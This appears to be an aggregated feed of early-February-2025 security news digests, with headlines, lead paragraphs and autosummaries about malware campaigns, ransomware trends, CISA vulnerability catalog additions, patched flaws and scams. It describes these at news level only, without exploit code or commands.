    Autosummary: “DevOps teams tell us they spend tens of thousands of hours each year sifting through alerts, researching whether vulnerabilities are reachable and if fixing them might break current functionality, prioritizing what to fix first, and then making sure the work gets done,” said Scott Robertson, CTO, ActiveState. "


    SparkCat Malware Uses OCR to Extract Crypto Wallet Recovery Phrases from Images

    exploits
    2025-02-06 https://thehackernews.com/2025/02/sparkcat-malware-uses-ocr-to-extract.html
    A new malware campaign dubbed SparkCat has leveraged a suite of bogus apps on both Apple's and Google's respective app stores to steal victims' mnemonic phrases associated with cryptocurrency wallets. The attacks leverage an optical character recognition (OCR) model to exfiltrate select images containing wallet recovery phrases from photo libraries to a command-and-control (C2) server, "

    Autosummary: This includes SMS messages from Indian banks, bank details, credit and debit card information, and government-issued identification details belonging to about 50,000 users, a majority of whom are located in the Indian states of West Bengal, Bihar, Jharkhand, Karnataka, and Madhya Pradesh. "


    The Evolving Role of PAM in Cybersecurity Leadership Agendas for 2025

    ciber
    2025-02-06 https://thehackernews.com/2025/02/the-evolving-role-of-pam-in.html
    Privileged Access Management (PAM) has emerged as a cornerstone of modern cybersecurity strategies, shifting from a technical necessity to a critical pillar in leadership agendas. With the PAM market projected to reach $42.96 billion by 2037 (according to Research Nester), organizations invest heavily in PAM solutions. Why is PAM climbing the ranks of leadership priorities? While Gartner "

    Autosummary: Depending on the industry or region, organizations may be subjected to the GDPR, HIPAA, PCI DSS, SOX, DORA, NIS2, and others. These cybersecurity standards, laws, and regulations mandate robust access controls, data protection measures, incident response capabilities, and thorough auditing activities. In the last year alone, 68% of all breaches included a human element, with people being involved either via error, privilege misuse, use of stolen credentials, or social engineering. By addressing pressing challenges such as insider threats, strict regulatory compliance, new types of cyberattacks, and the complexities of hybrid IT environments, PAM ensures that organizations remain resilient in the face of dynamic risks. High-profile incidents, such as the Change Healthcare data breach, in which 190 million records were compromised due to weak third-party access controls, underscore the need for robust PAM solutions. A robust PAM solution ensures that only the right people, at the right time, with the right level of access, can interact with your critical systems — helping you stay resilient and compliant. Note: Syteca also integrates with SIEMs, ticketing systems, and SSO software, allowing you to build a cybersecurity ecosystem tailored to your specific needs. "


    North Korean APT Kimsuky Uses forceCopy Malware to Steal Browser-Stored Credentials

    exploits
    2025-02-06 https://thehackernews.com/2025/02/north-korean-apt-kimsuky-uses-lnk-files.html
    The North Korea-linked nation-state hacking group known as Kimsuky has been observed conducting spear-phishing attacks to deliver an information stealer malware named forceCopy, according to new findings from the AhnLab Security Intelligence Center (ASEC). The attacks commence with phishing emails containing a Windows shortcut (LNK) file that's disguised as a Microsoft Office or PDF document. "

    Autosummary: "


    Top 3 Ransomware Threats Active in 2025

    exploits ransomware
    2025-02-06 https://thehackernews.com/2025/02/top-3-ransomware-threats-active-in-2025.html
    You arrive at the office, power up your system, and panic sets in. Every file is locked, and every system is frozen. A ransom demand flashes on your screen: "Pay $2 million in Bitcoin within 48 hours or lose everything." And the worst part is that even after paying, there’s no guarantee you’ll get your data back. Many victims hand over the money, only to receive nothing in return, or worse, get "

    Autosummary: Ransom note demanding Bitcoin left by Virlock. During execution, ANY.RUN detects several malicious activities, revealing how Virlock operates (behavior of Virlock ransomware analyzed by Interactive Sandbox): a Virlock-specific mutex is identified, helping the malware ensure only one instance runs at a time to avoid interference. The ransom note includes .onion links that direct victims to the attackers' communication portal. In the MITRE ATT&CK section, we get a clear breakdown of Lynx's tactics and techniques, revealing how it operates (MITRE ATT&CK tactics and techniques used by Lynx ransomware): encrypting files to lock critical business data. LockBit: Teasing a Comeback in 2025. LockBit is one of the most notorious ransomware groups, known for its highly efficient encryption, double extortion tactics, and ability to evade traditional security measures. The Files Modification tab provides the changes of file system activity. Shortly after, a ransom note appears, and the desktop wallpaper is replaced with an extortion message directing victims to a TOR site, where attackers demand payment. Latest Lynx attack: In mid-January 2025, Lynx targeted Lowe Engineers, a prominent civil engineering firm based in Atlanta, Georgia. "


    Notorious hacker behind 40+ cyberattacks on strategic organizations arrested

    ciber
    2025-02-06 https://securityaffairs.com/173932/cyber-crime/spanish-police-arrested-notorious-hacker.html
    Spanish Police arrested an unnamed hacker who allegedly breached tens of government institutions in Spain and the US. Spanish National Police arrested a hacker responsible for multiple cyberattacks on government institutions in Spain and the U.S. Targets included the U.S. Army, UN, NATO, and other agencies. Some of the breached organizations are the U.S. Army, […] "

    Autosummary: “The suspect, who claimed responsibility for the intrusions into dark web forums, managed to access the computer services of public and private entities, including the Civil Guard, the Ministry of Defense, the National Mint and Stamp Factory, the Ministry of Education, Vocational Training and Sports, the Generalitat Valenciana, various Spanish universities, databases of NATO and the US Army, as well as other international companies and entities.” “The suspect, who had extensive knowledge of computers, had managed to set up a complex technological network through the use of anonymous messaging and browsing applications, through which he had managed to hide his tracks and thus make his identification difficult.” concludes the statement. "


    Critical Cisco ISE bug can let attackers run commands as root

    exploits
    2025-02-06 https://www.bleepingcomputer.com/news/security/critical-cisco-ise-bug-can-let-attackers-run-commands-as-root/
    Cisco has fixed two critical Identity Services Engine (ISE) vulnerabilities that can let attackers with read-only admin privileges bypass authorization and run commands as root. [...] "

    Autosummary: On Wednesday, the company also warned of high-severity vulnerabilities impacting its IOS, IOS XE, IOS XR (CVE-2025-20169, CVE-2025-20170, CVE-2025-20171) and NX-OS (CVE-2024-20397) software that can let attackers trigger denial of service (DoS) conditions or bypass NX-OS image signature verification. "


    Thailand cuts power and internet to areas of Myanmar to disrupt scam gangs

    financial
    2025-02-06 https://www.bitdefender.com/en-us/blog/hotforsecurity/thailand-cuts-power-and-internet-to-areas-of-myanmar-to-disrupt-scam-gangs
    Well, this is a different approach to the scam problem... The government of Thailand has cut the power supply to areas near its border with Myanmar that are known to host brutal scam compounds. These heavily-guarded fraud factories house armies of people, coerced into defrauding innocent people through bogus investment and romance-baiting scams. Read more in my article on the Hot for Security blog. "

    Autosummary: Last month its state-run newspaper, the Global New Light of Myanmar, described how the country's military government had repatriated more than 55,000 foreigners, mostly Chinese, back to their home countries after being forced to work in scam compounds. "


    Fake Google Chrome Sites Distribute ValleyRAT Malware via DLL Hijacking

    exploits
    2025-02-06 https://thehackernews.com/2025/02/fake-google-chrome-sites-distribute.html
    Bogus websites advertising Google Chrome have been used to distribute malicious installers for a remote access trojan called ValleyRAT. The malware, first detected in 2023, is attributed to a threat actor tracked as Silver Fox, with prior attack campaigns primarily targeting Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China. "This actor has increasingly targeted key roles "

    Autosummary: "


    Ransomware Extortion Drops to $813.5M in 2024, Down from $1.25B in 2023

    exploits
    2025-02-06 https://thehackernews.com/2025/02/ransomware-extortion-drops-to-8135m-in.html
    Ransomware attacks netted cybercrime groups a total of $813.5 million in 2024, a decline from $1.25 billion in 2023. The total amount extorted during the first half of 2024 stood at $459.8 million, blockchain intelligence firm Chainalysis said, adding payment activity slumped after July 2024 by about 3.94%. "The number of ransomware events increased into H2, but on-chain payments declined, "

    Autosummary: The most commonly observed ransomware variants during 2024 were Akira (11%), Fog (11%), RansomHub (8%), Medusa (5%), BlackSuit (5%), BianLian (4%), and Black Basta (4%). "


    Microsoft says attackers use exposed ASP.NET keys to deploy malware

    exploits
    2025-02-06 https://www.bleepingcomputer.com/news/security/microsoft-says-attackers-use-exposed-aspnet-keys-to-deploy-malware/
    Microsoft warns that attackers are deploying malware in ViewState code injection attacks using static ASP.NET machine keys found online. [...] "

    Autosummary: "


    Critical RCE bug in Microsoft Outlook now exploited in attacks

    exploits
    2025-02-06 https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-microsoft-outlook-now-exploited-in-attacks/
    CISA warned U.S. federal agencies on Thursday to secure their systems against ongoing attacks targeting a critical Microsoft Outlook remote code execution (RCE) vulnerability. [...] "

    Autosummary: "


    Hackers exploit SimpleHelp RMM flaws to deploy Sliver malware

    exploits
    2025-02-06 https://www.bleepingcomputer.com/news/security/hackers-exploit-simplehelp-rmm-flaws-to-deploy-sliver-malware/
    Hackers are targeting vulnerable SimpleHelp RMM clients to create administrator accounts, drop backdoors, and potentially lay the groundwork for ransomware attacks. [...] "

    Autosummary: Once connected via RMM, the attackers quickly executed a series of discovery commands to learn more about the target environment, including system and network details, users and privileges, scheduled tasks and services, and domain controller information. "


    New scams could abuse brief USPS suspension of inbound packages from China, Hong Kong

    financial
    2025-02-06 https://www.malwarebytes.com/blog/news/2025/02/new-scams-could-abuse-brief-usps-suspension-of-inbound-packages-from-china-hong-kong
    News about USPS suspending shipments from China and Hong Kong may give scammers some ideas to defraud consumers "

    Autosummary: Malicious messages could claim to arrive from the shipper, the e-commerce platform, or Customs, asking for additional information to get a package released. "


    U.S. CISA adds Microsoft Outlook, Sophos XG Firewall, and other flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-02-06 https://securityaffairs.com/173949/hacking/u-s-cisa-adds-microsoft-outlook-sophos-xg-firewall-and-other-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Outlook, Sophos XG Firewall, and other flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The vulnerability CVE-2024-21413 (CVSS score of 9.8) is a Remote Code Execution flaw in Microsoft Outlook. […] "

    Autosummary: "


    Online food ordering and delivery platform GrubHub discloses a data breach

    financial
    2025-02-05 https://securityaffairs.com/173848/data-breach/grubhub-suffered-a-data-breach.html
    Online food ordering and delivery platform GrubHub suffered a data breach that exposed the personal information of drivers and customers. This week the online food ordering and delivery firm GrubHub disclosed a data breach that exposed customer and driver information. Recently, the company detected an anomalous activity within its infrastructure, then it launched an investigation […] "

    Autosummary: Online food ordering and delivery platform GrubHub discloses a data breach. Pierluigi Paganini, February 05, 2025. Online food ordering and delivery platform GrubHub suffered a data breach that exposed the personal information of drivers and customers. "


    More destructive cyberattacks target financial institutions

    financial ciber
    2025-02-05 https://www.helpnetsecurity.com/2025/02/05/financial-institutions-cybersecurity-incidents/

    Financial institutions will continue to be the ultimate targets for criminals and threat actors, as a successful attack offers a significant payoff, according to Contrast Security. Contrast Security has surveyed 35 of the world’s leading financial institutions to better understand their cyber threat landscape and the extent to which they are — or are not — addressing key threats. 64% of financial institutions said their organization had experienced cybersecurity incidents in the past 12 months. … More

    The post More destructive cyberattacks target financial institutions appeared first on Help Net Security.

    "

    Autosummary: Over two-thirds experienced attacks focused on stealing non-public market information, with cybercriminals using it for insider trading, digital front running, and shorting stock before they dox the stolen, confidential data to the regulators. "


    Atrinet URL Scanner helps combat SMS phishing

    financial
    2025-02-05 https://www.helpnetsecurity.com/2025/02/05/atrinet-url-scanner/

    Atrinet launched Atrinet URL Scanner, a solution designed to combat real-time SMS fraud. The solution combines Google Web Risk’s technology scanning capabilities with Atrinet’s telecom security expertise, enabling Communication Service Providers (CSPs) to safeguard subscribers, protect revenues, and build customer trust. The rising threat of SMS Fraud Smishing attacks—fraudulent messages containing harmful links—have surged by 60% in 2024, costing billions of dollars globally. Existing firewalls can fail to scan URLs effectively, leaving fraudulent links unchecked. … More

    The post Atrinet URL Scanner helps combat SMS phishing appeared first on Help Net Security.

    "

    Autosummary: The solution combines Google Web Risk’s technology scanning capabilities with Atrinet’s telecom security expertise, enabling Communication Service Providers (CSPs) to safeguard subscribers, protect revenues, and build customer trust. "


    CISA Adds Four Actively Exploited Vulnerabilities to KEV Catalog, Urges Fixes by Feb 25

    exploits
    2025-02-05 https://thehackernews.com/2025/02/cisa-adds-four-actively-exploited.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added four security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-45195 (CVSS score: 7.5/9.8) - A forced browsing vulnerability in Apache OFBiz that allows a remote attacker to obtain unauthorized "

    Autosummary: "


    Crypto-stealing iOS, Android malware found on App Store, Google Play

    exploits
    2025-02-05 https://www.helpnetsecurity.com/2025/02/05/crypto-stealing-ios-android-malware-found-on-app-store-google-play-sparkcat-malicious-sdk/

    A number of iOS and Android apps on Apple’s and Google’s official app stores contain a software development kit (SDK) that allows them to exfiltrate cryptowallets’ seed recovery phrases, Kaspersky researchers have found. “The infected apps in Google Play had been downloaded more than 242,000 times. This was the first time a stealer had been found in Apple’s App Store,” they pointed out. The apps have also been pushed via unofficial app stores. The malicious … More

    The post Crypto-stealing iOS, Android malware found on App Store, Google Play appeared first on Help Net Security.

    "

    Autosummary: In each case, we received words in Chinese, Japanese, Korean, English, Czech, French, Italian, Polish and Portuguese. The list includes food delivery, AI chatbot, cryptocurrency exchange/wallet, payment, news, VPN, messaging, and sport apps. Around the same time, ESET researchers warned about trojanized WhatsApp and Telegram apps for Windows and Android that could both steal and modify content copied to clipboards (e.g., when copy-pasting various types of information), and use optical character recognition (OCR) to recognize text – more specifically, cryptocurrency wallet recovery phrases – in screenshots stored on the compromised devices. "


    Navigating the Future: Key IT Vulnerability Management Trends

    exploits
    2025-02-05 https://thehackernews.com/2025/02/navigating-future-key-it-vulnerability.html
    As the cybersecurity landscape continues to evolve, proactive vulnerability management has become a critical priority for managed service providers (MSPs) and IT teams. Recent trends indicate that organizations increasingly prioritize more frequent IT security vulnerability assessments to identify and address potential security flaws. Staying informed on these trends can help MSPs and IT teams "

    Autosummary: VulScan features: local and remote internal vulnerability management; local and hosted external vulnerability scanning; multi-tenant management dashboard; vulnerability noise management; automatic service ticket creation; ability to scan by IP address, domain name or hostname. Learn more about VulScan today. Companies are increasing the frequency of vulnerability assessments: in 2024, 24% of respondents said they conduct vulnerability assessments more than four times per year, up from 15% in 2023. "


    CISA tags Microsoft .NET and Apache OFBiz bugs as exploited in attacks

    exploits
    2025-02-05 https://www.bleepingcomputer.com/news/security/cisa-tags-microsoft-net-and-apache-ofbiz-bugs-as-exploited-in-attacks/
    The US Cybersecurity & Infrastructure Security Agency (CISA) has added four vulnerabilities to its Known Exploited Vulnerabilities catalog, urging federal agencies and large organizations to apply the available security updates as soon as possible. [...] "

    Autosummary: Though the agency has marked those flaws as actively exploited in attacks, it has not provided specific details about the malicious activity, who is conducting it, and against whom. "


    Man sentenced to 7 years in prison for role in $50m internet scam

    financial
    2025-02-05 https://www.tripwire.com/state-of-security/man-sentenced-7-years-jail-role-50m-internet-scam
    A California man has been sentenced to seven years in prison for his involvement in a fraudulent scheme that saw over 50 individuals and organisations lose millions of dollars. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: In reality, the stolen funds were moved to bank accounts around the world, including in Russia, Georgia, Hong Kong, and Turkey. "


    Cybercrime gang exploited VeraCore zero-day vulnerabilities for years (CVE-2025-25181, CVE-2024-57968)

    exploits
    2025-02-05 https://www.helpnetsecurity.com/2025/02/05/cybercrime-exploited-veracore-zero-day-vulnerabilities-cve-2025-25181-cve-2024-57968-xe-group/

    XE Group, a cybercriminal outfit that has been active for over a decade, has been quietly exploiting zero-day vulnerabilities (CVE-2025-25181, CVE-2024-57968) in VeraCore software, a popular solution for warehouse management and order fulfillment. According to Intezer and Solis Security researchers, their targets are companies in the manufacturing and distribution sectors. “In one instance, the group was found to have compromised an organization in 2020, maintaining persistent access to an endpoint for over four years,” Intezer … More

    The post Cybercrime gang exploited VeraCore zero-day vulnerabilities for years (CVE-2025-25181, CVE-2024-57968) appeared first on Help Net Security.

    "

    Autosummary: The most curious thing about these cyberattackers is their continuing use of the XE Group name and certain pseudonyms for domains, variable names, user agents, and various accounts (email, GitHub, social media), which means that they are apparently not overly concerned about concealing their identities or being tied to certain attack activities. "


    Cybercriminals Use Go Resty and Node Fetch in 13 Million Password Spraying Attempts

    ciber
    2025-02-05 https://thehackernews.com/2025/02/cybercriminals-use-axios-and-node-fetch.html
    Cybercriminals are increasingly leveraging legitimate HTTP client tools to facilitate account takeover (ATO) attacks on Microsoft 365 environments. Enterprise security company Proofpoint said it observed campaigns using HTTP clients Axios and Node Fetch to send HTTP requests and receive HTTP responses from web servers with the goal of conducting ATO attacks. "Originally sourced from public "

    Autosummary: The Axios campaign is said to have primarily singled out high-value targets like executives, financial officers, account managers, and operational staff across transportation, construction, finance, IT, and healthcare verticals. "


    Silent Lynx Using PowerShell, Golang, and C++ Loaders in Multi-Stage Cyberattacks

    ciber
    2025-02-05 https://thehackernews.com/2025/02/silent-lynx-using-powershell-golang-and.html
    A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan. "This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision making and banking sector," Seqrite Labs researcher Subhajeet Singha said in a technical report "

    Autosummary: "


    U.S. CISA adds Microsoft .NET Framework, Apache OFBiz, and Paessler PRTG Network Monitor flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-02-05 https://securityaffairs.com/173889/security/u-s-cisa-adds-microsoft-net-framework-apache-ofbiz-paessler-prtg-network-monitor-flaws-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft .NET Framework, Apache OFBiz, and Paessler PRTG Network Monitor flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: In September 2024, Apache fixed a high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5) […] "

    Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-45195 (CVSS score of 9.8) Apache OFBiz Forced Browsing Vulnerability CVE-2024-29059 (CVSS score of 7.5) "


    Argentina leader orders WHO exit in move mirroring Trump’s

    latam
    2025-02-05 https://www.bbc.com/news/articles/c8975qp1n4qo
    Argentina says it objects to the way the international health body handled the Covid-19 pandemic. "

    Autosummary: Javier Milei was the first president whom Trump met after being elected last November. The two leaders have expressed admiration for each other, with Milei calling Trump’s re-election the "greatest political comeback in history", while the US president described his Argentine counterpart as "my favourite president". "


    Ransomware payments fell by 35% in 2024, totalling $813,550,000

    exploits
    2025-02-05 https://www.bleepingcomputer.com/news/security/ransomware-payments-fell-by-35-percent-in-2024-totalling-813-550-000/
    Payments to ransomware actors decreased 35% year-over-year in 2024, totaling $813.55 million, down from $1.25 billion recorded in 2023. [...] "

    Autosummary: [Figure: Comparison between extortion attempts and payments. Source: Chainalysis] No more ransom: the decline in ransomware payments despite increased attacks in 2024 is explained by several key factors, primarily higher victim resistance. "


    CISA orders agencies to patch Linux kernel bug exploited in attacks

    exploits Linux
    2025-02-05 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-linux-kernel-bug-exploited-in-attacks/
    ​CISA has ordered federal agencies to secure their systems within three weeks against a high-severity Linux kernel flaw actively exploited in attacks. [...] "

    Autosummary: "


    AMD fixes bug that lets hackers load malicious microcode patches

    exploits
    2025-02-05 https://www.bleepingcomputer.com/news/security/amd-fixes-bug-that-lets-hackers-load-malicious-microcode-patches/
    ​AMD has released mitigation and firmware updates to address a high-severity vulnerability that can be exploited to load malicious CPU microcode on unpatched devices. [...] "

    Autosummary: According to AMD’s development resources, SEV isolates guests and the hypervisor from one another, and SEV-SNP adds memory integrity protection that creates an isolated execution environment by helping prevent malicious hypervisor-based attacks (e.g., data replay, memory re-mapping, and more). "


    U.S. CISA adds Linux kernel flaw to its Known Exploited Vulnerabilities catalog

    exploits Linux
    2025-02-05 https://securityaffairs.com/173897/hacking/u-s-cisa-adds-linux-kernel-flaw-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Linux kernel vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Linux kernel vulnerability, tracked as CVE-2024-53104, to its Known Exploited Vulnerabilities (KEV) catalog. The February 2025 Android security updates addressed 48 vulnerabilities, including the zero-day flaw CVE-2024-53104, which is actively exploited in attacks […] "

    Autosummary: "


    New Microsoft script updates Windows media with bootkit malware fixes

    exploits
    2025-02-05 https://www.bleepingcomputer.com/news/microsoft/new-microsoft-script-updates-windows-media-with-bootkit-malware-fixes/
    Microsoft has released a PowerShell script to help Windows users and admins update bootable media so it utilizes the new "Windows UEFI CA 2023" certificate before the mitigations of the BlackLotus UEFI bootkit are enforced later this year. [...] "

    Autosummary: [Figure: Script to apply CVE-2023-24932 mitigations to bootable Windows media. Source: BleepingComputer] "The PowerShell script described in this article can be used to update Windows bootable media so that the media can be used on systems that trust the Windows UEFI CA 2023 certificate," explains a new support bulletin about the script. "


    Google fixed actively exploited kernel zero-day flaw

    exploits Linux
    2025-02-04 https://securityaffairs.com/173812/hacking/google-android-kernel-zero-day-flaw.html
    The February 2025 Android security updates addressed 48 vulnerabilities, including a kernel zero-day flaw exploited in the wild. The February 2025 Android security updates addressed 48 vulnerabilities, including a zero-day flaw, tracked as CVE-2024-53104, which is actively exploited in attacks in the wild. “There are indications that CVE-2024-53104 may be under limited, targeted exploitation.” reads Google’s […] "

    Autosummary: "


    8 steps to secure GenAI integration in financial services

    financial
    2025-02-04 https://www.helpnetsecurity.com/2025/02/04/financial-institutions-genai-risks/

    GenAI offers financial services institutions enormous opportunities, particularly in unstructured dataset analysis and management, but may also increase security risks, according to FS-ISAC. GenAI can organize oceans of information and retrieve insights from it that you can use to improve business operations, maximize your markets, and enhance the customer experience. Those GenAI-analyzed datasets can turn up information about fraud, threats, and risks, which present remarkable security opportunities. “GenAI presents enormous opportunities for financial firms to … More

    The post 8 steps to secure GenAI integration in financial services appeared first on Help Net Security.

    "

    Autosummary: Obsessively protect your customers’ data Security techniques including differential privacy, encryption in transit and at rest, data sanitization, and sandboxing should be leveraged to maintain the confidentiality, integrity, and availability of sensitive information. "


    Cybersecurity jobs available right now: February 4, 2025

    ciber
    2025-02-04 https://www.helpnetsecurity.com/2025/02/04/cybersecurity-jobs-available-right-now-february-3-2025/

    Application Security Architect ReversingLabs | Ireland | Remote – View job details As an Application Security Architect, you will conduct security assessments and vulnerability scans of applications, APIs, and other software components. Identify, analyze, and report security vulnerabilities and risks. Develop and implement security controls and countermeasures to mitigate identified risks. Associate, Information Security Santander | USA | On-site – View job details As an Associate, Information Security, you will conduct regular security assessments and … More

    The post Cybersecurity jobs available right now: February 4, 2025 appeared first on Help Net Security.

    "

    Autosummary: Senior Network Cyber Security Specialist Sapiens | Israel | Hybrid – View job details As a Senior Network Cyber Security Specialist, you will secure and optimize hybrid networks, integrating SDN across on-premises, Azure, and AWS, while implementing micro-segmentation strategies using tools like NSX, Azure Virtual Network (VNet) Peering, and AWS Security Groups. IT Security Engineer Riverty | Germany | Hybrid – View job details As an IT Security Engineer, you will plan, implement, monitor, and upgrade security measures for the organization’s data, systems, and networks with a specific emphasis on application security. Security Intern Prysmian | Italy | On-site – View job details As a Security Intern, you will execute OSINT activities related to security scenarios and threats, draft security risk assessments—including both country security risk assessments and those for specific assets or occurrences—support the identification of security mitigation measures in physical and travel security, and assist in drafting security procedures and plans. Associate, Information Security Santander | USA | On-site – View job details As an Associate, Information Security, you will conduct regular security assessments and vulnerability scans using tools such as AWS GuardDuty, AWS Inspector, and AWS Config. "


    GrubHub data breach impacts customers, drivers, and merchants

    financial
    2025-02-04 https://www.bleepingcomputer.com/news/security/grubhub-data-breach-impacts-customers-drivers-and-merchants/
    ​Food delivery company GrubHub disclosed a data breach impacting the personal information of an undisclosed number of customers, merchants, and drivers after attackers breached its systems using a service provider account. [...] "

    Autosummary: "


    Microsoft Patches Critical Azure AI Face Service Vulnerability with CVSS 9.9 Score

    exploits
    2025-02-04 https://thehackernews.com/2025/02/microsoft-patches-critical-azure-ai.html
    Microsoft has released patches to address two Critical-rated security flaws impacting Azure AI Face Service and Microsoft Account that could allow a malicious actor to escalate their privileges under certain conditions. The flaws are listed below - CVE-2025-21396 (CVSS score: 7.5) - Microsoft Account Elevation of Privilege Vulnerability CVE-2025-21415 (CVSS score: 9.9) - Azure AI Face Service "

    Autosummary: "


    Google Patches 47 Android Security Flaws, Including Actively Exploited CVE-2024-53104

    exploits
    2025-02-04 https://thehackernews.com/2025/02/google-patches-47-android-security.html
    Google has shipped patches to address 47 security flaws in its Android operating system, including one it said has come under active exploitation in the wild. The vulnerability in question is CVE-2024-53104 (CVSS score: 7.8), which has been described as a case of privilege escalation in a kernel component known as the USB Video Class (UVC) driver. Successful exploitation of the flaw could lead "

    Autosummary: "


    Russian cybercrooks exploiting 7-Zip zero-day vulnerability (CVE-2025-0411)

    exploits rusia-ucrania
    2025-02-04 https://www.helpnetsecurity.com/2025/02/04/russian-cybercrooks-exploited-7-zip-zero-day-vulnerability-cve-2025-0411/

    CVE-2025-0411, a Mark-of-the-Web bypass vulnerability in the open-source archiver tool 7-Zip that was fixed in November 2024, has been exploited in zero-day attacks to deliver malware to Ukrainian entities, Trend Micro researchers have revealed. The 7-Zip vulnerability (CVE-2025-0411) Mark-of-the-Web (MotW) is a zone identifier used by the Windows operating system to flag files downloaded from the internet as potentially harmful. “CVE-2025-0411 allows threat actors to bypass Windows MoTW protections by double archiving contents using 7-Zip. … More

    The post Russian cybercrooks exploiting 7-Zip zero-day vulnerability (CVE-2025-0411) appeared first on Help Net Security.

    "

    Autosummary: CVE-2025-0411, a Mark-of-the-Web bypass vulnerability in the open-source archiver tool 7-Zip that was fixed in November 2024, has been exploited in zero-day attacks to deliver malware to Ukrainian entities, Trend Micro researchers have revealed. "


    Russian Cybercrime Groups Exploiting 7-Zip Flaw to Bypass Windows MotW Protections

    exploits rusia-ucrania
    2025-02-04 https://thehackernews.com/2025/02/russian-cybercrime-groups-exploiting-7.html
    A recently patched security vulnerability in the 7-Zip archiver tool was exploited in the wild to deliver the SmokeLoader malware. The flaw, CVE-2025-0411 (CVSS score: 7.0), allows remote attackers to circumvent mark-of-the-web (MotW) protections and execute arbitrary code in the context of the current user. It was addressed by 7-Zip in November 2024 with version 24.09. "The vulnerability was "

    Autosummary: The flaw, CVE-2025-0411 (CVSS score: 7.0), allows remote attackers to circumvent mark-of-the-web (MotW) protections and execute arbitrary code in the context of the current user. "


    North Korean Hackers Deploy FERRET Malware via Fake Job Interviews on macOS

    exploits
    2025-02-04 https://thehackernews.com/2025/02/north-korean-hackers-deploy-ferret.html
    The North Korean threat actors behind the Contagious Interview campaign have been observed delivering a collection of Apple macOS malware strains dubbed FERRET as part of a supposed job interview process. "Targets are typically asked to communicate with an interviewer through a link that throws an error message and a request to install or update some required piece of software such as VCam or "

    Autosummary: "By impersonating the legitimate postcss library, which has over 16 billion downloads, the threat actor aims to infect developers’ systems with credential-stealing and data-exfiltration capabilities across Windows, macOS, and Linux systems," security researchers Kirill Boychenko and Peter van der Zee said. "


    AMD SEV-SNP Vulnerability Allows Malicious Microcode Injection with Admin Access

    exploits
    2025-02-04 https://thehackernews.com/2025/02/amd-sev-snp-vulnerability-allows.html
    A security vulnerability has been disclosed in AMD’s Secure Encrypted Virtualization (SEV) that could permit an attacker to load a malicious CPU microcode under specific conditions. The flaw, tracked as CVE-2024-56161, carries a CVSS score of 7.2 out of 10.0, indicating high severity. "Improper signature verification in AMD CPU ROM microcode patch loader may allow an attacker with local "

    Autosummary: "


    Coyote Banking Trojan targets Brazilian users, stealing data from 70+ financial apps and websites

    financial exploits latam
    2025-02-04 https://securityaffairs.com/173818/malware/coyote-banking-trojan-targets-brazilian-users.html
    Coyote Banking Trojan targets Brazilian users, stealing data from over 70 financial applications and websites. FortiGuard Labs researchers detected a campaign using LNK files executing PowerShell commands to deploy the Coyote Banking Trojan. Threat actors target Brazilian users by stealing financial data, the malware can harvest sensitive information from over 70 financial applications and numerous […] "

    Autosummary: Coyote Banking Trojan targets Brazilian users, stealing data from over 70 financial applications and websites. "


    7-Zip MotW bypass exploited in zero-day attacks against Ukraine

    exploits
    2025-02-04 https://www.bleepingcomputer.com/news/security/7-zip-motw-bypass-exploited-in-zero-day-attacks-against-ukraine/
    A 7-Zip vulnerability allowing attackers to bypass the Mark of the Web (MotW) Windows security feature was exploited by Russian hackers as a zero-day since September 2024. [...] "

    Autosummary: Trend Micro says these attacks impacted the following organizations: State Executive Service of Ukraine (SES) – Ministry of Justice; Zaporizhzhia Automobile Building Plant (PrJSC ZAZ) – automobile, bus, and truck manufacturer; Kyivpastrans – Kyiv Public Transportation Service; SEA Company – appliances, electrical equipment, and electronics manufacturer; Verkhovyna District State Administration – Ivano-Frankivsk oblast administration; VUSA – insurance company; Dnipro City Regional Pharmacy – regional pharmacy; Kyivvodokanal – Kyiv Water Supply Company; Zalishchyky City Council – city council. Update 7-Zip: although the discovery of the zero-day came in September, it took Trend Micro until October 1, 2024, to share a working proof-of-concept (PoC) exploit with the developers of 7-Zip. "


    Ontinue ION for IoT Security secures critical operational environments

    industry
    2025-02-04 https://www.helpnetsecurity.com/2025/02/04/ontinue-ion-for-iot-security/

    Ontinue announced the expansion of its managed services to include IoT/OT environments. Ontinue ION for IoT Security is an add-on service to the Ontinue ION MXDR service that extends continuous protection to customers’ IoT and OT environments. As organizations integrate more IoT and OT devices into their operations, they face an expanding attack surface and increasing vulnerability to sophisticated cyber threats. Recent research reveals that nearly one-third of organizations experienced six or more intrusions in … More

    The post Ontinue ION for IoT Security secures critical operational environments appeared first on Help Net Security.

    "

    Autosummary: "


    Malicious Go Package Exploits Module Mirror Caching for Persistent Remote Access

    exploits
    2025-02-04 https://thehackernews.com/2025/02/malicious-go-package-exploits-module.html
    Cybersecurity researchers have called attention to a software supply chain attack targeting the Go ecosystem that involves a malicious package capable of granting the adversary remote access to infected systems. The package, named github.com/boltdb-go/bolt, is a typosquat of the legitimate BoltDB database module (github.com/boltdb/bolt), per Socket. The malicious version (1.3.1) was published to "

    Autosummary: "


